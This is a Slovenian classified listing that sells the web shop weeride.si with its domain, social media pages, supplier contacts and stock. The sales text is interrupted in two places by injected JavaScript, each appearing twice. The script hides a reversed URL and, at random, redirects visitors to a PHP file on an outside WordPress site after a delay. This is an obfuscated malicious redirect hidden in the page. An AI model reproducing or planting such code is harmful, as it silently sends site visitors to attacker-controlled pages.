Spletno trgovino weeride.si

 Spletna trgovina

3.500,00€

Prodam spletno trgovino www.weeride.si.
V ceni je vse od spletne strani SLO in HR, do FB (SLO in HR) in Instagram (samo SLO) strani, domena je plačana do junija 2024. Domena je bila registrirana junija 2012, tako da je že dobro rangirana v Googlu. Zraven dam vse v smislu navodil za uporabo, nalepk za pakete, ves marketinški material (slike). Spletna stran je bila leta 2019 narejena popolnoma na novo.
Potenciala je še ogromno, tako v SLO kot na HR, kajti do sedaj se artikli dejansko niso praktično nič oglaševali, kljub temu pa je bila prodaja. Poleg tega so bili le$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tos na SLO stran dodani še GUTO artikli (zelo kvalitetni nahrbtniki za nošenje otroka, kolesarske prikolice, telovniki, itd., ampak zaradi preobremenjenosti z drugim poslom ni bilo niti oglaševanja, niti neke prave prodaje. Prodaje je bilo na letni ravni zadnje dve leti za cca 8.000€ letno, kar je malo, ampak $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to je prodaja praktično brez oglaševanja. Marže so cca 50%.
Nabavlja se iz EU, lahko tudi Anglija. Seveda pustim vse kontakte od dobaviteljev. Če bi želeli ponudbo še razširiti imam kontakt od dobavitelja ki prodaja tudi kolesa in še nekaj drugih zanimivih artiklov.
Cena je 3500€ + zaloga (cca 4000€).

  • Listing ID: 2683
  • Vključuje: Zaloge, Spletna stran
  • Vključno s podjetjem: NE - samo dejavnost
  • Ustanovljeno: 2012
Contact details

Osrednjeslovenska,1233 Show Phone Number ***** http://www.weeride.si

Contact this listing owner